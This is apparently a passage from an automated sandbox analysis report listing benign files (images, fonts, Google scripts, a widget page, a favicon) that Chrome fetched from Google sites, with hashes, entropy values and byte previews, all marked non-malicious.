                                                                                                                                                                                                                                                                                          SHA1:F8ED3D958ABAC1716C8B9315DDB7A0F21EF7E5C5
                                                                                                                                                                                                                                                                                          SHA-256:FF1F6CE7A89C380F7924074ABFCC5AA989989BB9D2E747F146D0B3F2EF6813F9
                                                                                                                                                                                                                                                                                          SHA-512:962E87C760F0F7446F62CFC37DF8DC7E9A08193F8B88A603038E57D4E9F00DB52D04279BDD410B90D7AA4E99A28078052E6F51E44A5BE21D5FBF49A3BF3F676D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(......Y......1....H...:.C2.. .IDATx..{.o.U..Yk...u...yJ3#..{F..H<...rL......I*.q..*.8..I...........SB$J..[@y.. ..P.8e.@.cIH..}.}w..w..+....9.s.....J..nu..w.{......^./.!w..........uw......R.....X..._.W..;}im.,..s|._...+.*.;.^urK.}.>qbK.].qc.?.......}.N_+.,..9.{o..~W..E...5C.'T..$.i]....}..'...K7;...I......C.......;y./...usU....W....x..c.xU5.J*.B..0...^.r........1.}....>...N..............A.....7.z.\.>.<(....P!..T1TA....O..X,."0.#+$._.f.w{!......S_.{..........*.-..z.x\.7.._=T.K`....Y...Q..@....K....].`..3.N..I.g.b?.........hn.+F..._^Y.r..>b..R...^E^.%..*["P...S.`..00.E.u.ZA.._..I.'..lo%....9.I....._...j.....~.~....m.d.....S9..x."...T..,.......N...P......Wc.j$.J|W..'..#.......$..p.0@..E.....9....?.}..9./)....{..a.&....S...J. .%...e..@...%....(f!.!.......W..<&......lf..V]..N.....I.....{w...?.../.|Y..O...|.Fy.V...O...Ey8'
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 832x460, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):45100
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.995251890618906
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:768:eRXKdqZ4xfYOO3IwLEUvJaHtSgDzyhyKnzV2yaA6afjnzczy8+oJZMkBHMsYc8:aGqZ4xf17HZ3EZzJaAbIyl8ZNM88
                                                                                                                                                                                                                                                                                          MD5:20436A29B6FD849F2612B96038E23139
                                                                                                                                                                                                                                                                                          SHA1:D6B0170AFF0151688F7F550F6B2715502F5C9A52
                                                                                                                                                                                                                                                                                          SHA-256:8652CBBD238192C0DEF5DFD04BC6BFE00A28A247C1C6B224764A1C9FBE494B01
                                                                                                                                                                                                                                                                                          SHA-512:FFC0231BE0F0370C07A79E0EC946C252E217288214098CCA90B5197BD9C8746D5A724376E66C4C8DD56E0C60950FE2A0099984BAE5C51C6A5AA0F18907B45A41
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF$...WEBPVP8 .....=...*@...>I .D..!".R.8P..cno.z..~k..kG..P>kzZ.x..W._X,...........a................o...?2.i........................-._.......z....~............/..._............+.....O.g....k..=.z.~U....j./.w....{.o..._.?..S....W.$.........4.g<................~........C.A................<..-.-..z..P1N..{.F....LGY...5...u ..9.<M.{.5....P{.x{...=..$B....h..6K..4..u..$w.P..p!..../.uo..4...Q.....d...2.....g.s..Ta..9.&........aY...;..iB....^....sQ....X..<.,.D..h..PL.a....b...Y....P..ox.n\.......EU.,...L....:..n.Q..AU...h.J.81..k...{@..<.?....C..j.........A.......@...o.a..g..q.....^..(...7.p..........Q.pH..`Vs.l~....Q..u..cb2....$n......T..v..=sO&._...`.$......8..$Y....5.S|.....r.0....~.CY"5la....:r&.....ok......_Hk.n...Uj.'.p.M..^._....=.L.6..i.WzaG.P.I....pf}..B).u..r..W\Y.:.....|.h...$..-}......#x.p4.5T..$..k.|\.......b.....xF.{J.......I./...l..t..|.3q)m%.fR.O?,.#3....].`w..l..\.tn..c...^....."<..5j...t.S.....n..`:..\......Q.,?..'.G...1....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):813
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.1177525812347575
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:tvCF61JzhgMgsbkCx0J8A9IKLkmbmtSqYzzfXFGtetUw/QOCUpM9YNrhykm:tZ1x0uwdqKL3bfqY9MetU6QeM9Y3Hm
                                                                                                                                                                                                                                                                                          MD5:E3598D780C8FF8607121797205734033
                                                                                                                                                                                                                                                                                          SHA1:631285F021305066437DB867C371AF1EC2E131E2
                                                                                                                                                                                                                                                                                          SHA-256:B95E30C771A3B8FCDF7ABCBC7A5C926D28ADD773E737742A64157406B5E0D973
                                                                                                                                                                                                                                                                                          SHA-512:21829FE3E70E1FF1E14643F062F212DC48A27234364AA2E477A4346B2AF8E9E536CED8673C1CECC31F623227189811EAEC00F58BE1EC7679956FA34D0532BAFF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/b1/66/af1aac544473b3bd6c22f20da279/googleg-fullcolor-24px.svg
                                                                                                                                                                                                                                                                                          Preview:<svg id="GoogleG_FullColor_rgb" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 23 24"><defs><style>.cls-1{fill:#4285f4;}.cls-2{fill:#34a853;}.cls-3{fill:#fabb05;}.cls-4{fill:#e94235;}</style></defs><title>GoogleG_FullColor_rgb_24px</title><g id="_24px" data-name="24px"><path class="cls-1" d="M23,12.27A14,14,0,0,0,22.81,10H12v4h6.09a6.75,6.75,0,0,1-2.36,4.09v3h3.79A11.87,11.87,0,0,0,23,12.27Z"/><path class="cls-2" d="M11.75,24a11.08,11.08,0,0,0,7.77-2.91l-3.79-3a6.94,6.94,0,0,1-4,1.16,7,7,0,0,1-6.59-5H1.26v3.09A11.72,11.72,0,0,0,11.75,24Z"/><path class="cls-3" d="M5.16,14.29a7.09,7.09,0,0,1,0-4.58V6.62H1.26a12.12,12.12,0,0,0,0,10.76Z"/><path class="cls-4" d="M11.75,4.75a6.33,6.33,0,0,1,4.51,1.8h0l3.35-3.42A11.15,11.15,0,0,0,11.75,0,11.72,11.72,0,0,0,1.26,6.62l3.9,3.09A7,7,0,0,1,11.75,4.75Z"/></g></svg>
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (6274)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):8161
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.448293049957296
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:stzX4Kha+bZVBlwMEFUmD8V6IeMdndp3hW2hTBx2E3OEWW4K:6zIKh1bfrwMK9DM6lsnddhW2NBqXWD
                                                                                                                                                                                                                                                                                          MD5:DC2ECC8CBD247E55A77683E967B525C6
                                                                                                                                                                                                                                                                                          SHA1:7A5B16192FE938F8FF27AFA965AD9901D35EF124
                                                                                                                                                                                                                                                                                          SHA-256:4F433112F18C52E1323C7AE85F84DB3299EBDE91E5580AF05E7D64D08B8B57BF
                                                                                                                                                                                                                                                                                          SHA-512:E07DC9DB0500575DF07DBDB3B0E0914F9FEFDC8C68660F36E2FD5DB0A0EC00C75EFDCD2CD9F6BE6F3604530108BC13275D05A3EB8F211FF9A4FA8956478DCA01
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:/**. * @license. * Copyright 2017 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */const w=globalThis,N=w.trustedTypes,S=N?N.createPolicy("lit-html",{createHTML:n=>n}):void 0,B="$lit$",u=`lit$${(Math.random()+"").slice(9)}$`,L="?"+u,Z=`<${L}>`,m=document,b=()=>m.createComment(""),H=n=>n===null||typeof n!="object"&&typeof n!="function",P=Array.isArray,j=n=>P(n)||typeof n?.[Symbol.iterator]=="function",M=`[ ..\f\r]`,y=/<(?:(!--|\/[^a-zA-Z])|(\/?[a-zA-Z][^>\s]*)|(\/?$))/g,I=/-->/g,R=/>/g,p=RegExp(`>|${M}(?:([^\\s"'>=/]+)(${M}*=${M}*(?:[^ ..\f\r"'\`<>=]|("|')|))|$)`,"g"),U=/'/g,O=/"/g,W=/^(?:script|style|textarea|title)$/i,f=Symbol.for("lit-noChange"),c=Symbol.for("lit-nothing"),k=new WeakMap,g=m.createTreeWalker(m,129);function D(n,t){if(!Array.isArray(n)||!n.hasOwnProperty("raw"))throw Error("invalid template strings array");return S!==void 0?S.createHTML(t):t}const z=(n,t)=>{const s=n.length-1,e=[];let i,r=t===2?"<svg>":"",o=y;for(let a=0;a<s;a++){const h=n[a];let $,A,l=-1,_=0;for
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):262548
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.572767425406477
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:4lipmFU74li04d7G3BsEemvebNqH0fxnQF:KrW744nhi2y
                                                                                                                                                                                                                                                                                          MD5:533F594729CF80931EC8BC3A069CA842
                                                                                                                                                                                                                                                                                          SHA1:C3BE97A4140E2774221A4D992220F210FFF09F13
                                                                                                                                                                                                                                                                                          SHA-256:96BC3A7A7425925CD23585BFF486BD111D7474796694E74DB229FC652D2C3C88
                                                                                                                                                                                                                                                                                          SHA-512:A329F95747A481EDD00F7AA0B8B6188059EF5576936B141B14A408DEB2372228EDF49F30258765DDA9F1371444A59DEDFBFEF2342332FC9EDFFE1C9166837B81
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.googletagmanager.com/gtag/js?id=G-W46717PY19&l=dataLayer&cx=c
                                                                                                                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_cross_domain","priority":16,"vtp_rules":["list","recovertogether\\.withgoogle\\.com"],"tag_id":8},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetVa
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):15344
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.984625225844861
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:ctE5KIuhGO+DSdXwye6i9Xm81v4vMHCbppV0pr3Ll9/w:cqrVO++tw/9CICFbQLlxw
                                                                                                                                                                                                                                                                                          MD5:5D4AEB4E5F5EF754E307D7FFAEF688BD
                                                                                                                                                                                                                                                                                          SHA1:06DB651CDF354C64A7383EA9C77024EF4FB4CEF8
                                                                                                                                                                                                                                                                                          SHA-256:3E253B66056519AA065B00A453BAC37AC5ED8F3E6FE7B542E93A9DCDCC11D0BC
                                                                                                                                                                                                                                                                                          SHA-512:7EB7C301DF79D35A6A521FAE9D3DCCC0A695D3480B4D34C7D262DD0C67ABEC8437ED40E2920625E98AAEAFBA1D908DEC69C3B07494EC7C29307DE49E91C2EF48
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2......;........H..;..........................d..@..J.`..L.T..<.....x.....^...x.6.$..6. ..t. ..I.h|.l....A....b6........(......@e.]...*:..-.0..r.)..hS..h...N.).D.........b.].......^..t?.m{...."84...9......c...?..r3o....}...S]....zbO.../z..{.....~cc....I...#.G.D....#*e.A..b...b`a5P.4........M....v4..fI#X.z,.,...=avy..F.a.\9.P|.[....r.Q@M.I.._.9..V..Q..]......[ {u..L@...]..K......]C....l$.Z.Z...Zs.4........ x.........F.?.7N..].|.wb\....Z{1L#..t....0.dM...$JV...{..oX...i....6.v.~......)|.TtAP&).KQ.]y........'...:.d..+..d..."C.h..p.2.M..e,.*UP..@.q..7..D.@...,......B.n. r&.......F!.....\...;R.?-.i...,7..cb../I...Eg...!X.)5.Aj7...Ok..l7.j.A@B`".}.w.m..R.9..T.X.X.d....S..`XI..1... .$C.H.,.\. ..A(.AZ.................`Wr.0]y..-..K.1.............1.tBs..n.0...9.F[b.3x...*$....T..PM.Z-.N.rS?I.<8eR'.3..27..?;..OLf*.Rj.@.o.W...........j~ATA....vX.N:.3dM.r.)Q.B...4i.f..K.l..s....e.U.2...k..a.GO.}..../.'..%$..ed.*.'..qP....M..j....../.z&.=...q<....-..?.A.%..K..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (32127)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):48485
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.797914665454021
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:JSEyhBRvpueuV1OH7k453wnpJGTCYVQI12aFe04+GR6zzXgf522598aHzkr4hnUT:V1Obt5AnpJ4LVYh2Uxzk2aNxp1yWoxU
                                                                                                                                                                                                                                                                                          MD5:36094F52013A535198E8B122017A8F3F
                                                                                                                                                                                                                                                                                          SHA1:3933D83E4DC68532E1F2CF69A977FF2334D2DF8E
                                                                                                                                                                                                                                                                                          SHA-256:529A36AC9F22420769C6CA2CF09EF7E6A78F5F39399B77579259ACDF1B20586D
                                                                                                                                                                                                                                                                                          SHA-512:A17C8C8606D74534974A90E97EFE4096F90C2473D60BEA97CDC806A970CA2CF04344AD5CA3590841441D01D55BCDA69DF6B4F311CCAC683E2DA9FE099568D1B4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://ogs.google.com/widget/callout?prid=19037050&pgid=19037049&puid=9ceb59a7585b55bd&eom=1&cce=1&dc=1&origin=https%3A%2F%2Fwww.google.com&cn=callout&pid=1&spid=538&hl=en
                                                                                                                                                                                                                                                                                          Preview:<!doctype html><html lang="en" dir="ltr"><head><base href="https://ogs.google.com/"><link rel="preconnect" href="//www.gstatic.com"><meta name="referrer" content="origin"><link rel="canonical" href="https://ogs.google.com/widget/callout"><link rel="preconnect" href="https://www.gstatic.com"><link rel="preconnect" href="https://ssl.gstatic.com"><script data-id="_gd" nonce="wdJWlBY7gD72QnmKAUnU4w">window.WIZ_global_data = {"DpimGf":false,"EP1ykd":["/_/*"],"FdrFJe":"-1790310330695291898","Im6cmf":"/_/OneGoogleWidgetUi","LVIXXb":1,"LoQv7e":true,"MT7f9b":[],"MUE6Ne":"OneGoogleWidgetUi","NrSucd":false,"OwAJ6e":false,"QrtxK":"","S06Grb":"","S6lZl":128566913,"TSDtV":"%.@.[[null,[[45459555,null,false,null,null,null,\"Imeoqb\"]],\"CAMSDx0K99WlEPaumhAKs5wNCg\\u003d\\u003d\"]]]","Vvafkd":false,"Yllh3e":"%.@.1727448077950037,146720517,3959934416]","ZwjLXe":538,"cfb2h":"boq_onegooglehttpserver_20240923.00_p0","eptZe":"/_/OneGoogleWidgetUi/","fPDxwd":[48802160,97517168,97684531],"gGcLoe":false,"iCzhF
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1488x828, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):76892
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.997834794173462
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:1536:PzG7GyjDOIdX95QnAUoohRmTn9hvHjvB7rYrbNr0ptkrCFtMo12:PzE/XuoormDPjNroJr0pSb5
                                                                                                                                                                                                                                                                                          MD5:2891394008B4932FE3F66CA17819F0F2
                                                                                                                                                                                                                                                                                          SHA1:68363CB08E300A36FD145E658838E44555419048
                                                                                                                                                                                                                                                                                          SHA-256:EFE90647C22DADD1ECB1404A867F15D8BADE85229A5F9AA6E73B2D6143699ACE
                                                                                                                                                                                                                                                                                          SHA-512:07354F6199C03CC2154299E3A9EC4587C2284E8E7967A26AA517A99AD6294B57435D30CB06A3A0B1EACA315A169201656E57E83262DE8452EAF315C3AB14B78B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/x56lg5bBK6Pa84w02ZiizXr1ED2Szz_t02tKlR4MD8d_3tNoq0e558CpmNTRa-fe6XEuwC1UlrC1UKKnE4K26EE9l296qQ6woohU=s0-rw-e365
                                                                                                                                                                                                                                                                                          Preview:RIFFT,..WEBPVP8 H,...]...*..<.>=..C.!..(......gl.Ar|..>.N..6....(..7......?......>......+............t....G..|....W....]dr.........N[.......O.........|...._.U..[.?...................s...=......oS....._._...X....v.z[|../$O.......8.T.g...oM...|PN.F..X#..`%4..9Q.:.?N.'.g..n...0q9].*J>..E...p9.H..d....s......!.x6}r..}..C.&..7.,W....rR.K=..)$T.."....v.#.oX.RD......X....k.........V.._U]..x.8}...v.'..R.....S.wC..n.. ....].....07.{r..Os...&.V...a..#m..Rlfil.....N.[.Z..;Y...r.x..L'.W.7:.....$........\...._..T.............pc.=.^....N.F]q..'E9./##{..C...}=......\z.+....#..*c..\ .n..F..o+9.T.....F.vCh....>.>i.]N.<....~q..dw..I.F.... .M..e^...!WHP...F...a..F9A.............5n^.......g.C.i.../....y.%K...%.....7..hg..5G..&~..#....7~......V.....J|.-%.V.7`K....?^..J_...>e.t.9vP.5....UY0...5.....].*.S...B.Q...-.....>o.k.6^...rg1.v.WKq.....+."./..j.AY.=a...@..9........s4.U......b...$.(.....".L.V...s...&...^'...y....0.....IM....X.CG...<.".'.`.'.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 59204, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):59204
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.996065473593907
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:1536:94cQ8ndSQPlJg1JB8l29QFCtkSrqcLOjxDgHX:94c/dSQdMj8lU4vSrlLOjYX
                                                                                                                                                                                                                                                                                          MD5:960F506622C3B6B7DE3436763ACA8888
                                                                                                                                                                                                                                                                                          SHA1:EF567DD2C71E3EC6BF0AE43BA6F83C66D16CE33E
                                                                                                                                                                                                                                                                                          SHA-256:5CC7D40033E2A243C0D5907CC38DF4494027E2F8B6C2CA65A5190946333E50FE
                                                                                                                                                                                                                                                                                          SHA-512:F7139BACCC20E29B94C590A488B551CEF493DB032AF6C7E35DBD26437C9F710D64E36B7CAFCE4A68349D1F61020C0108B1BD0FE89CC5F4DADB23346605C32D02
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/googlesans/v61/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPjkUvaYr.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2.......D.......@.....................................:?HVAR...`?STAT..'...f/<.....l..V....0..L.6.$..6. ..b.._..[,x.....W.,.t...M.{u...H4....Y+u....a.v..n..)...........ON*c.;..@H13.*.f...bJ..X.>9...K......-I..4/Qqj.pY...B$P:M%.l...$.C.{...Y...=q.W.....,Y..)...+..I..];'..`...V.8o._......g..o.Ua.G.N../..K..pj6cE....7..9....&Q...[|..K..."d...s+.R.T..Vd^ay..C&...7....,...I.p'l..P...w*6......W.....J..4.GT%j...Q...w.....r.r ..Y.F.s..G...n.......E.B.!@.a..C`.Q...5.h.....c..V....8J.c.R.....;...Zk..t).H.......]..*...t.'F.....U.~fP.9......D....}..d..".....PX.`R.o.h:.6..6m......'.|.>.1k.T.*x....(..1C.T....6t.3l.1.6.0..i...g...(:Y.ms...D..G...[.._[.=......8...$...~.N...m....o...{.s....,}.z(...............J....../.|`Y.-..[......k...xX:...a.}4.[.7.Mb ..._.UECx[...s."_...:}.a..G2.....9.b(3.R.X.](J+:j.2.?).=...C..[.......E.?....j.l.w.G".g...^'c.!&kU.6.\.Y..J.y.~..Y.c$.G.-E...r...S...ou..'^!.......x<..h.{1..+.S.+...*...< Nr...[..............#...=...f..E..V....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3695
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.88804280702612
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:t9Gxmk27ifs6xJtIQoB3oUOOVjUh2Hi4ak5+ZcY1o/jSqJvNReAn4af0h2Trfolo:Kds6x0QkVjZnakMcmqj4afY2TrQLX85P
                                                                                                                                                                                                                                                                                          MD5:C87773A3095A6870E4842E5E07869466
                                                                                                                                                                                                                                                                                          SHA1:C51BF4EEE9A05F5EB0D41C53223E7B6F5A1CD39E
                                                                                                                                                                                                                                                                                          SHA-256:BBD8CA8AC70BCEED0F225E8F302C685A9297AC68C3518BCE9240312572081EC4
                                                                                                                                                                                                                                                                                          SHA-512:2C927189211F93C5C4E3FD7799FC56A8AC80B165EB38F2E57EEDAAF8E23D37518B8E82FD579E51503214DD189AF25A96BB3E0F3CE46948DB06BBAF3BDC44D91B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d....&IDATx..y.\E..?o.2.......Q!....$......c.r(Z.h...Pb...*....((q5....q..B,`...Q.>...H.%{.7...'E........Tmm..t.o......5$$$$$$$D....Ab...`2..y......Y't...C'.]............!.N..s.....sF.y%dSC.C#.]...y........P..4...@..../.].........q.U..5.2...:o..0ZF..vA..,...>.....{...NQ..1b...z.p#p.0Jq.e.1`..u.U\w..H........gX..7.{r*j.$.-.I.........\...'.].......Y..bD2..h..7....D...F.Y.A...i=.GD#.@WD..b..l....Fh.x....a.R....+.#b....}......|2j;...o.Fx!..W.(..........^.....P.....Fm..b-.].D.3...]88j...[.+^....Fm....../.V`...S@:jC.0=j...K.+......qcC..x!..........Q.....l....OQ.&V..R..x!V........^k>...^.....kg.F...Q.....l.....8.3.7.....Bl...A.....6.+.........q..#....D..].5.jA....Q. C..#."...:.<R.g#....|!.w.v..]..Q.!..Swas$..m....i.e.y+.....d......;...\f@E[.EU......x?{....Y..f.2.'.?R.=.....4...&.m.Y.].'...-.n.....>...`..Y`..3.f.:...<.!n#..2.$....p1.qk..H....{...E...k.R#./[.... f._...r=....Q.e..R0.I...[....|....9p9.....\.\o.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 512 x 340, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):193769
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.980179307292795
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:1OHwYdknFAPZLp9BVAYpAAwg7cXCqkpQzFgf8DQ6y4c/pFpYkQQ:lYdyiZLHPAxJiWC3pQCfbp/pFukQQ
                                                                                                                                                                                                                                                                                          MD5:965B3B8F90228A96AE600BDBFFC37F06
                                                                                                                                                                                                                                                                                          SHA1:1C266F425F33E76A171985BF060AB91AE849EE0F
                                                                                                                                                                                                                                                                                          SHA-256:75E487EC564F864B0403590BB58EA71222322FB4B4889A338D712E81F7D0C946
                                                                                                                                                                                                                                                                                          SHA-512:7178DB878633C074ECEDAADFA331BF02D5C8F52C55ABAD67DAFB505DDC75D352CABD403313529D71C6B77479B486770D86B41EAB39B3F8775FB40CF1AE265E73
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/5aJF9xA7xUeccUjstpG7egKV6rX7m_iedrX2dzOptBB0ckf7XEK-fwp2bPtzPMlY9MmrvAKEFErirf4SHKLuUOSk8E3loYryDYOobe13o0fpPcbYL1An?=w1440
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.......T............eiCCPicc..H..W.XS...[......... ...Z..R..!.$........k.Q....+ ......bAEY.uQ..7!.]....;...O..3....e.\T..<i.<>2.565.Ez.P...9.....;...@.....n.D._uQq.s....P......8C...A....A ...@T...T..b.9....*...T8C...m..9._.@.......zV. ...?A.&.J.....8H ..!V.>,/o...C...e..x.o.7.Y.........:.~...(d....gi....*.|..F...U......Sa*...XU.!...u.....QIj{.T.....&.nB~..bS.#..1..}F.$..1\-.4I>7.b#........-...._hm.........~U..(s....7b.W....).S .).$.@L..U.....,.sb.l..xU.6.....j~. S..../.S..m.K.1.| _.....vR....].I.I.<"...\...pu..s.4)A..#...W..)..8.=n%.T. .T.$h....pq...LY~\.:N.0.?*N....D....,..-.L..@..Y....G"...A.....f`FJ...>.@!..".P..........<.U?]@f.hA......<......t.[2x.5..x..&..........W..j.5..G..%1..F."F..q.<.....3.6w......=.)....p..F.=I2O.]..A...."..Z.v......!;d...p.=..6..={A-G...*.....7....FF.C.!d..g..^.,.Z.[.u.......|..M....}o.-..bg...9....,..V.].....z........y$.....TUR.V....I=./....x...rI.8.._...+...c........__o.....y..n.%.........x.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):5430
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.6534652184263736
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:wIJct3xIAxG/7nvWDtZcdYLtX7B6QXL3aqG8Q:wIJct+A47v+rcqlBPG9B
                                                                                                                                                                                                                                                                                          MD5:F3418A443E7D841097C714D69EC4BCB8
                                                                                                                                                                                                                                                                                          SHA1:49263695F6B0CDD72F45CF1B775E660FDC36C606
                                                                                                                                                                                                                                                                                          SHA-256:6DA5620880159634213E197FAFCA1DDE0272153BE3E4590818533FAB8D040770
                                                                                                                                                                                                                                                                                          SHA-512:82D017C4B7EC8E0C46E8B75DA0CA6A52FD8BCE7FCF4E556CBDF16B49FC81BE9953FE7E25A05F63ECD41C7272E8BB0A9FD9AEDF0AC06CB6032330B096B3702563
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/favicon.ico
                                                                                                                                                                                                                                                                                          Preview:............ .h...&... .... .........(....... ..... ............................................0...................................................................................................................................v.].X.:.X.:.r.Y........................................q.X.S.4.S.4.S.4.S.4.S.4.S.4...X....................0........q.W.S.4.X.:.................J...A...g.........................K.H.V.8..........................F..B.....................,.......................................B..............................................B..B..B..B..B...u..........................................B..B..B..B..B...{.................5.......k...........................................................7R..8F.................................................2........Vb..5C..;I..................R^.....................0................Xc..5C..5C..5C..5C..5C..5C..lv..........................................]i..<J..:G..Zf....................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):181
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.052245007941961
